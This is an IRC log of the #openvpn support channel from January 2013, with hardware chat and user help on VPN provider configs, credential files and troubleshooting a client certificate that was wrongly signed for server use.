~3k conntrack states when I restarted my rtorrent after it crashed late last week 22:23 <+denon> krzee: http://routerboard.com/CCR1036-12G-4S 22:23 <@vpnHelper> Title: RouterBoard.com : CCR1036-12G-4S (at routerboard.com) 22:23 <+denon> 36 core, 24 million pps 22:24 <+denon> 16Gbit wire speed 22:24 <+denon> kiss your wrt54g goodbye ;) 22:24 <+pekster> denon: Why not run openpvn on a more suitaable device behind this thing? Then you could edit your config directly? 
22:24 <+denon> pekster: because all the real vpn traffic comes into other devices, this is just for some niche stuff 22:25 <@krzee> hazardous, i have not, but im a fan of ubiquiti 22:25 <+denon> yeah, mikrotik and ubiquiti go hand in hand 22:26 <+denon> ubiq is more suited toward CPE and wireless side though 22:26 <+denon> mikrotik is more designed for core and edge, good for wisp work 22:26 <@krzee> cant you get under the hood? 22:26 <+denon> hazardous: btw, unless I missed it, edgemax still isnt out 22:26 <@krzee> to the cli? 22:27 <+denon> vaporware 22:27 <+denon> krzee: the cli is their cli 22:27 <+denon> and it looks like it does support client certs, old documentation from ages ago threw me 22:27 <@krzee> is that a riddle? 22:27 <+denon> it's an IOS style cli 22:27 <+denon> not a bash shell with filesystem access 22:27 <@krzee> werd 22:28 <+denon> it handles a lot of packets and a lot of routing protocols pretty well 22:28 <+denon> which is the main goal usually 22:28 <@krzee> so does my dual core freebsd router 22:28 <@krzee> :D 22:28 <+denon> you can do 24M PPS on your fbsd router? :) 22:29 <@krzee> no idea, my weak ass 3rd world connection would piss itself WAYYYYYYYY earlier 22:29 <+denon> (I like fbsd as much as the next guy, dont get me wrong..) 22:29 <+denon> hehe 22:30 <@krzee> you know, our friend got me into freebsd long long ago 22:30 <+denon> uh huh, ask him who got him into fbsd .. 22:30 <@krzee> no shit? 22:30 <+denon> :) 22:30 <@krzee> werd 22:30 <+denon> it's a small world 22:30 <@krzee> so you indirectly got me into fbsd 22:31 <+denon> sorry 22:31 <@krzee> :-p 22:31 -!- youssef [~youssef@ip-83-134-156-208.dsl.scarlet.be] has quit [Remote host closed the connection] 22:32 <+denon> then again, that's like saying Al Gore got me into routing 22:33 <+pekster> You sure it wasn't senator what's-his-name that showed us all about the tubes? 
:P 22:34 <@krzee> al invented the tubes 22:34 <+denon> ted stevens 22:34 < EugeneKay> I prefer the dump truck model 22:34 <+denon> http://en.wikipedia.org/wiki/Series_of_tubes 22:34 <@vpnHelper> Title: Series of tubes - Wikipedia, the free encyclopedia (at en.wikipedia.org) 22:35 <+denon> in reality, it's more like a conveyor belt, with the occasional broken spindle 22:38 <@krzee> internet is a series of win tubes 22:38 <@krzee> just said on another network 22:39 <@krzee> (not because of me) 22:39 <+denon> it's intuitive.. 22:39 <+pekster> The Internet is like a series of self-managed IP routers and autonomous systems operating together for a common purpose. Oh, wait... 22:39 <+denon> "operating together"... 22:39 <+denon> yeah, that'd be nice 22:40 <+pekster> To be fair, "most" devices to IP reasonably correctly. Mostly. 22:40 <+pekster> do* 22:40 <+denon> pekster, meet Cogent :) 22:40 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 22:40 <@krzee> LOL 22:41 <+denon> well, my laptop has just informed me it's been a long day, and I'm down to 14% battery, probably time to wrap up for the evening.. 22:41 <+pekster> In 30 years I wonder what regrets we'll have over IPv6 design decisions 22:41 <@krzee> werd, gnite man, good to see ya 22:41 <@krzee> 30 years? 22:41 <+denon> thin client on the other hand has lots of power.. but then again, no good without my laptop to see the other side'a things 22:41 * denon mumbles 22:42 <+denon> pekster: you're assuming we'll have actually implemented ipv6 instead of just tunneling and extending 4? 22:42 <+denon> take it easy, gnite 22:42 * denon out 22:42 <+pekster> heh, night 22:44 <@krzee> why wait so long to start with the regrets? 
22:46 <+pekster> Pesumably we'll get more as new protocols and designs are born that IPvX doesn't handle well 22:46 <+pekster> The framers of v4 never envisioned the use we have today with p2p, streaming video, such huge uptake and demand for unique IPs, etc 22:50 < pppingme> pekster we will be on ipv8 by then 22:52 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 244 seconds] 23:54 -!- kernelPiCNic [~skyroveRR@unaffiliated/tarzach] has joined #openvpn 23:54 < kernelPiCNic> Hello, I am using openvpn along with vpnbook on a single machine http://www.vpnbook.com/ should I use openvpn as a server or as a client? THey already provided me the username and password. 23:54 <@vpnHelper> Title: VPNBook | 100% Free VPN Service - OpenVPN and PPTP (at www.vpnbook.com) 23:58 <+pekster> If you're using someone else's service you should get your config file from them since options must match on both peers for encryption and other configurations 23:59 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 23:59 <+pekster> If you're connecting to a peer that is a multi-client supporting server, you need to be configured as a client, obviously 23:59 <+pekster> Also: 23:59 <+pekster> !provider 23:59 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team. 
--- Day changed Sun Jan 27 2013 00:00 < kernelPiCNic> well, they simply have the username, password on their website http://www.vpnbook.com/ and there is a zip file I downloaded from them, it only has a crt file and a .ovpn file 00:00 <@vpnHelper> Title: VPNBook | 100% Free VPN Service - OpenVPN and PPTP (at www.vpnbook.com) 00:02 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 00:04 <+pekster> The .ovpn file is the config file 00:06 < kernelPiCNic> ok 00:07 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Remote host closed the connection] 00:07 < kernelPiCNic> and what about the crt file? is it ca crt or just client crt? 00:07 <+pekster> I have no clue since I am not your provider 00:07 < kernelPiCNic> ok. 00:07 <+pekster> If you wish to learn how openvpn works, start here: 00:07 <+pekster> !howto 00:07 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 00:07 < kernelPiCNic> I'll check that. 
00:16 -!- ak5_ [~ak5@unaffiliated/ak5] has quit [Remote host closed the connection]
00:24 -!- kernelPiCNic [~skyroveRR@unaffiliated/tarzach] has left #openvpn []
01:10 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
01:10 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
01:10 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
01:10 -!- mode/#openvpn [+o krzee] by ChanServ
01:26 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn
01:29 -!- jthunder [~jthunder@174.3.126.51] has quit [Client Quit]
01:29 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Ping timeout: 255 seconds]
01:49 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 256 seconds]
02:05 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn
02:06 -!- roentgen [~arthur@openvpn/community/support/roentgen] has joined #openvpn
02:14 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Excess Flood]
02:15 -!- roentgen [~arthur@openvpn/community/support/roentgen] has joined #openvpn
02:20 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Ping timeout: 252 seconds]
02:54 -!- brute11k [~brute11k@89.249.230.213] has joined #openvpn
03:05 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
03:17 -!- roentgen [~arthur@openvpn/community/support/roentgen] has joined #openvpn
03:25 -!- andi [~andi@unaffiliated/fr00d] has joined #openvpn
03:25 < andi> Hello
03:26 < andi> I have an openvpn tunnel for which I need username and password. I put them into a file which I give as parameter to auth-user-pass. After that I secured the file with chmod 0600.
03:26 < andi> After a while the tunnel is breaking down and I'm getting the error: ERROR: could not read Auth username from stdin
03:27 < andi> Why is openvpn looking for the username and password at stdin when I think the openvpn server goes away or my internet connection is restarted?
03:27 < andi> The openvpn version I'm using is 2.2.2.
03:30 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
03:31 < andi> Ah, I think this is the problem: http://community.openvpn.net/openvpn/ticket/225
03:31 <@vpnHelper> Title: #225 ('--auth-user-pass FILE' and '--auth-nocache' problem) – OpenVPN Community (at community.openvpn.net)
03:32 < andi> I tried to comment out auth-nocache to check if this works when openvpn runs in the negotiation timeout.
03:56 -!- bisko [~bisko@178.254.232.159] has joined #openvpn
04:05 -!- bisko [~bisko@178.254.232.159] has quit [Quit: Textual IRC Client: www.textualapp.com]
04:15 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 255 seconds]
04:21 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer]
04:37 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit []
04:38 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Read error: Operation timed out]
04:56 -!- AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 245 seconds]
04:58 -!- zz_AsadH [~AsadH@irc.unixio.com] has joined #openvpn
04:58 -!- zz_AsadH is now known as AsadH
04:58 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host]
04:58 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn
05:02 -!- bisko [~bisko@178.254.232.159] has joined #openvpn
05:24 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
05:50 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds]
05:55 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
06:03 -!- hazardous [~dbn@2001:470:8932:6855:4185::fe80] has quit [Ping timeout: 245 seconds]
06:03 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Quit: Konversation terminated!]
06:11 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 256 seconds]
06:13 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
06:18 -!- hazardous [~dbn@2001:470:8932:6855:4185::fe80] has joined #openvpn
06:31 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has joined #openvpn
06:36 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 244 seconds]
06:37 -!- bisko [~bisko@178.254.232.159] has quit [Read error: Operation timed out]
06:52 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds]
06:59 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
07:36 -!- JackWinter [~jack@vodsl-4655.vo.lu] has left #openvpn ["Konversation terminated!"]
07:38 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn
07:40 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn
08:01 < Eagleman> How do you suggest storing credentials securely for auto connecting?
08:04 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has left #openvpn ["Leaving"]
08:06 < kisom> Eagleman: Full disk encryption.
08:09 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
08:21 -!- p3rror [~mezgani@2001:0:53aa:64c:3468:555a:d673:d5e1] has joined #openvpn
08:25 < jackbrown> HOW CAN I CHECK 100% when I'M behind a VPN with openVPN that my real connection will not be used and my real IP will not be detected?
08:26 < Eagleman> what is my ip
08:27 < Eagleman> should be something different than normal when using redirect gateway
08:57 -!- vpopov [~happylife@149.62.17.217] has joined #openvpn
09:10 < Eagleman> kisom, its a server, so i doubt full disk encryption will work
09:12 -!- p3rror [~mezgani@2001:0:53aa:64c:3468:555a:d673:d5e1] has quit [Ping timeout: 245 seconds]
09:13 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn
09:35 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via]
09:50 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: bbl]
10:05 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has joined #openvpn
10:09 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn
10:10 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Remote host closed the connection]
10:14 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn
10:18 -!- b1rkh0ff [~b1rkh0ff@31.176.152.170] has quit [Ping timeout: 245 seconds]
10:19 -!- b1rkh0ff [~b1rkh0ff@109.163.163.189] has joined #openvpn
10:24 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
10:24 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
10:24 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
10:25 -!- mode/#openvpn [+o krzee] by ChanServ
10:26 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
10:41 -!- DrCode_ [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
10:42 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds]
10:42 -!- DrCode_ is now known as DrCode
10:50 -!- n2deep_ [n2deep@odin.sdf-eu.org] has quit [Quit: Lost terminal]
10:53 -!- irksome [~root@host-92-20-171-234.as13285.net] has joined #openvpn
10:54 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Ping timeout: 240 seconds]
10:56 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn
10:57 < irksome> hi. Is the openVPN connect client source available? Or is it just the server?
11:01 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 240 seconds]
11:01 -!- Orbi [~opera@anon-184-212.vpn.ipredator.se] has joined #openvpn
11:02 -!- APTX [~APTX@unaffiliated/aptx] has quit [Remote host closed the connection]
11:07 <@krzee> irksome, openvpn connect is not opensource
11:07 <@krzee> community openvpn is
11:10 < irksome> ok thanks. Do you know if there are any open source windows clients available? (or a command line one that I could create a wrapper for...)
11:10 <@krzee> !download
11:10 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only
11:10 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs
11:10 <@krzee> #1
11:10 <@krzee> that is community openvpn ^
11:10 <@krzee> (what we support here)
11:11 <@krzee> and since you want source:
11:11 <@krzee> !git
11:11 <@vpnHelper> "git" is (#1) For the stable git tree: git clone git://openvpn.git.sourceforge.net/gitroot/openvpn/openvpn.git or (#2) For the development git tree: git clone git://openvpn.git.sourceforge.net/gitroot/openvpn/openvpn-testing.git or (#3) Browse the git repositories here: http://openvpn.git.sourceforge.net/git/gitweb-index.cgi or (#4) See !git-doc how to use git
11:11 <@krzee> (in case you want most up to date code)
11:14 < irksome> ok thanks.
11:16 < irksome> the fact that there is a separate client for download made me think there were two different bits of software. I understand now.
11:18 <@krzee> ya the open source version uses the same install for client or server depending on config
11:19 <@krzee> the $$ version has separate client and server
11:19 <@krzee> !as
11:19 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server
11:19 <@krzee> thats the $ version, comes with support and makes setups REALLY easy
11:20 <@krzee> or thats the goal... i havnt actually used it
11:23 < irksome> I'm just trying to learn about vpns at the moment, so will leave AS for when I get a job :)
11:23 -!- u0m3 [~Radu@109.96.140.34] has quit [Read error: Connection reset by peer]
11:27 -!- u0m3 [~Radu@92.80.109.202] has joined #openvpn
11:30 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn
11:38 -!- Orbi [~opera@anon-184-212.vpn.ipredator.se] has quit [Quit: Orbi]
11:40 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn
11:46 -!- ryanstop [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn
11:46 -!- ryanstop [~Valcorb@94-227-38-227.access.telenet.be] has quit [Client Quit]
11:47 -!- ryanstop [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn
11:49 -!- irksome [~root@host-92-20-171-234.as13285.net] has left #openvpn []
11:49 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Ping timeout: 252 seconds]
11:57 -!- vpopov [~happylife@149.62.17.217] has quit [Ping timeout: 252 seconds]
12:12 -!- ryanstop [~Valcorb@94-227-38-227.access.telenet.be] has quit []
12:12 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn
12:15 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
12:45 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has quit [Ping timeout: 245 seconds]
12:48 -!- vpopov [~happylife@149.62.17.217] has joined #openvpn
12:51 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 244 seconds]
12:53 -!- raidz_away [~raidz@raidz.im] has joined #openvpn
12:53 -!- raidz_away is now known as raidz
12:53 -!- raidz [~raidz@raidz.im] has quit [Changing host]
12:53 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn
12:53 -!- mode/#openvpn [+o raidz] by ChanServ
13:02 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn
13:03 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
13:04 -!- m0sphere [m0sphere@S01060018e78c9cff.cg.shawcable.net] has quit []
13:48 <@krzee> !route
13:48 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide
14:02 -!- brute11k1 [~brute11k@89.249.235.57] has joined #openvpn
14:03 -!- brute11k [~brute11k@89.249.230.213] has quit [Ping timeout: 244 seconds]
14:10 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has quit [Read error: Connection reset by peer]
14:12 -!- Porkepix [~Porkepix@lns-bzn-24-82-64-185-50.adsl.proxad.net] has quit [Ping timeout: 245 seconds]
14:15 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has joined #openvpn
14:17 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 276 seconds]
14:34 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 255 seconds]
14:37 -!- Devastator [~devas@177.18.199.61] has joined #openvpn
14:37 -!- Devastator [~devas@177.18.199.61] has quit [Read error: Connection reset by peer]
14:39 -!- Devastator [~devas@177.18.199.61] has joined #openvpn
14:39 -!- Devastator [~devas@177.18.199.61] has quit [Changing host]
14:39 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
14:40 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn
14:47 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 245 seconds]
14:50 -!- vpopov [~happylife@149.62.17.217] has quit [Ping timeout: 245 seconds]
15:09 -!- ag4ve [~ag4ve@96.26.67.194] has quit [Ping timeout: 245 seconds]
15:16 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
15:17 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn
15:20 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Read error: Operation timed out]
15:38 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has joined #openvpn
15:38 -!- khem_ is now known as william_
15:55 -!- brute11k1 [~brute11k@89.249.235.57] has quit [Quit: Leaving.]
16:04 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has quit [Read error: Connection reset by peer]
16:10 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
16:27 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder]
16:44 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has quit [Quit: ZNC - http://znc.in]
16:55 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Remote host closed the connection]
17:05 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 276 seconds]
17:08 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn
17:09 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Ping timeout: 244 seconds]
17:10 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn
17:12 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit [Ping timeout: 256 seconds]
17:16 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Ping timeout: 255 seconds]
17:26 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has quit [Quit: Computer has gone to sleep.]
17:34 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 17:42 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 17:42 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Remote host closed the connection] 17:49 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has quit [Read error: Connection reset by peer] 17:50 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has joined #openvpn 18:14 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 18:39 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 18:41 -!- hazardous [~dbn@2001:470:8932:6855:4185::fe80] has quit [Changing host] 18:41 -!- hazardous [~dbn@openvpn/user/hazardous] has joined #openvpn 18:41 -!- mode/#openvpn [+v hazardous] by ChanServ 20:26 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 21:00 -!- midkniht [~midkniht@cpe-70-112-107-27.austin.res.rr.com] has joined #openvpn 21:00 < midkniht> http://pastebin.com/4JxAykbw 21:00 < midkniht> anyone help me diagnose my cert tls issue here? 21:03 < midkniht> i used easy-rsa/2.0 to create the certs for the server and client 21:03 < midkniht> i really dont know enough to read those errors 21:09 <+pekster> Sounds like you've used the incorrect cert on one side of the connection (using a server cert as a client, or vise-versa) or possibly referenced the wrong cert as your CA in one side of the config 21:11 < midkniht> well, ok that is possible 21:12 < midkniht> when i distribute the key and crt for the client should i not include the servers ca.crt? 21:12 < midkniht> i thought i had to 21:12 <+pekster> Try increasing the verbosity to 'verb 4' and the logs may have more detail. 
Otherwise, send the cert the client is using over to the server and run 'openssl verify -verbose -CAfile ca.crt -purpose sslclient your_client_cert.crt' 21:13 <+pekster> midkniht: There is no such thing as the "server ca.crt." The CA is the PKI's root certificate. The CA issues *all* the certs, including that of all clients and servers 21:13 <+pekster> You need the CA cert as the reference in your --ca directive for OpenVPN, not a server or client cert 21:13 <+pekster> !pki 21:13 <@vpnHelper> "pki" is (#1) http://openvpn.net/index.php/open-source/documentation/howto.html#pki for how to make your PKI stuff (ca, and certs) or (#2) Heres a basic rundown of how it works... The server, client, and ca certs are all signed by the same ca.key. The server and client use the ca.crt to check that eachother were signed by the right ca.key. Optionally, the client also checks that the server cert was 21:13 <@vpnHelper> signed specially as a server (see !servercert) 21:14 < midkniht> ok for a client, should it not need a ca.crt specified? 21:14 <+pekster> Both sides need the ca.crt available and referenced 21:14 < midkniht> right i signed all the certs on the same machine with the ca.key 21:15 < midkniht> i used the same ca.crt on the client that i generated on the server 21:15 < midkniht> is that where i am making a mistage? 21:15 < midkniht> mistake 21:15 <+pekster> Can you restart your server with 'verb 4' and post the full portion of the certificate verification sequence? 21:16 <+pekster> That should tell in more detail what's broken 21:16 < midkniht> did that, it wasnt anything new 21:16 < midkniht> but i will 21:16 < midkniht> hold on 21:17 <+pekster> Be sure you restart the service after adding 'verb 4' to the config since it won't pick it up otherwise 21:17 < midkniht> http://pastebin.com/Stw7TTKp 21:18 < midkniht> pekster: see what im saying nothing new 21:18 <+pekster> CN=karma, is that your client? 
21:18 < midkniht> \yes 21:18 < midkniht> shouldbe fqdn 21:19 < midkniht> ? 21:19 <+pekster> No, it doesn't matter, I just want to make sure that's what you're expecting as the client name (your CN can be whatever you like.) 21:20 < midkniht> karma is client, laney is server 21:20 <+pekster> Can you paste the server config? It's choking on some missing/invalid cert purpose, so the config should point to what it wants (then we'll check your client cert) 21:20 < midkniht> sure 21:20 < midkniht> http://pastebin.com/Mm4498eY 21:20 < midkniht> server conf 21:21 < midkniht> http://pastebin.com/j6xtpM0L - client conf 21:21 < midkniht> ca.crt is the same on both 21:24 <+pekster> You shouldn't have 'ns-cert-type server' in your server config. It appears to be commented out (line 18) but that directive neds to check for a client cert, not a server cert 21:24 < midkniht> so delete that commented line 21:25 < midkniht> done 21:25 <+pekster> Well, if it's commented it won't matter, (normally you *do* want to check that on both sides) but it's commented, so if it's using that config it won't matter 21:25 <+pekster> !mitm 21:25 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: ns-cert-type server in the client config 21:25 < midkniht> i used easy-rsa build-key-server 21:25 <+pekster> (that's the how and the why, for a full understanding. Not really relevant right now) 21:26 < midkniht> so i dont need it on the client side either? 21:26 <+pekster> You should definiatly do server-cert verification client side 21:26 < midkniht> k 21:26 <+pekster> That link the bot pasted above explains why 21:26 < midkniht> noted 21:26 <+pekster> But, the client sin't the one spewing errors, right? 
21:26 < midkniht> no 21:27 < midkniht> i could make it verbose if you like 21:27 <+pekster> Okay, let's check the client cert. Can you send the client cert to the server, and then run 'openssl verify -verbose -CAfile ca.crt -purpose sslclient karma.crt' on the server? 21:29 < midkniht> i got the same errror 21:29 < midkniht> i think we are on to something now 21:29 <+pekster> And nothing more verbose? :\ 21:29 < midkniht> root@laney:/etc/openvpn# openssl verify -verbose -CAfile ca.crt -purpose sslclient easy-rsa/2.0/keys/karma.crt 21:29 < midkniht> easy-rsa/2.0/keys/karma.crt: /C=US/ST=TX/L=Austin/O=Administr8/Duuit!/CN=karma/emailAddress=support@administr8.me 21:29 < midkniht> error 26 at 0 depth lookup:unsupported certificate purpose 21:29 < midkniht> OK 21:29 <+pekster> Hmm 21:29 <+pekster> Allright, pastebin 'openssl x509 -in karma.crt -noout -text' 21:29 <+pekster> Let's see what's up with that cert 21:30 < midkniht> http://pastebin.com/sBnvcH1f 21:31 <+pekster> That cert is signed as a server, not a client (line 41 on that output) 21:31 <+pekster> Further, it's usually a really bad idea to use special symbols like slashes and puncuation in your CN field 21:34 < midkniht> recreating 21:34 < EugeneKay> It's allowed, just stupid. 21:34 <+pekster> Yea. I didn't say invalid, just bad idea (it'll cause you all sorts of headaches down the road, like if you use the CN to do per-client rules or ccd's) 21:35 <+pekster> Plus it'll make poorly-written shell scripts do unexpected things ;) 21:35 <+pekster> You'd need to re-create the entire PKI to fix that midkniht, since your CA has symbols in its CN too 21:35 < midkniht> how to clear the db? 21:36 <+pekster> Plus the Org field 21:36 < midkniht> i edited vars to fix it 21:36 < midkniht> but i want to erase the store 21:36 < midkniht> rm keys/* 21:36 < midkniht> ? 
21:36 <+pekster> The clean-all will clear the entire PKI
21:37 <+pekster> Run that script and it'll give you a "fresh" PKI by removing everything you've set up thus far
21:37 < midkniht> perfect
21:37 < midkniht> thanks
21:37 <+pekster> And if you've messed with openssl.cnf at all be sure you return it to a stock setup
21:38 <+pekster> The important thing is to get the client cert generated with client values, not server ones (ie: don't use build-key-server for your client)
21:38 <+pekster> Somehow that's what you did last time
21:42 < midkniht> that did
21:42 < midkniht> it
21:42 < midkniht> thanks pekster
21:42 < midkniht> i send you virtual cookies and tacos
21:43 <+pekster> A virtual beer would be better (I just finished my last real-world one...)
21:43 * midkniht beers pekster
21:43 <+pekster> I guess there's always the Canadian Whiskey on the shelf...)
22:18 -!- b1rkh0ff [~b1rkh0ff@109.163.163.189] has quit [Ping timeout: 245 seconds]
22:19 -!- b1rkh0ff [~b1rkh0ff@31.176.186.83] has joined #openvpn
22:34 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Quit: Leaving]
22:39 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn
22:42 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Read error: Operation timed out]
23:31 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has joined #openvpn
23:47 -!- Cpt-Oblivious is now known as FemaleVaccumStal
23:47 -!- FemaleVaccumStal is now known as Cpt-Oblivious
--- Day changed Mon Jan 28 2013
00:01 -!- osirisx11 [~osiris@93.114.44.253] has joined #openvpn
00:01 < osirisx11> hi all, how can i start an openvpn connection after my wifi connects?
00:02 < osirisx11> (automatically)
00:03 <+pekster> By running the openvpn command from whatever facility your OS provides for post-connection process execution when the interface is up
00:10 <@krzee> by leaving it running all the time and just letting it connect when you get online
00:11 <@krzee> unless you mean you ONLY want it on wifi, as opposed to via ethernet
00:12 < ngharo> how do y'all manage multiple tunnels? i just throw my configs in and let the init script start em all
00:12 <@krzee> depends on the os
00:13 < ngharo> but been thinking of a way to turn off individual tunnels on demand
00:13 <+pekster> My distro of choice (gentoo) already does that in its initscripts
00:13 < ngharo> right now i just kill pid manually
00:13 <@krzee> !management
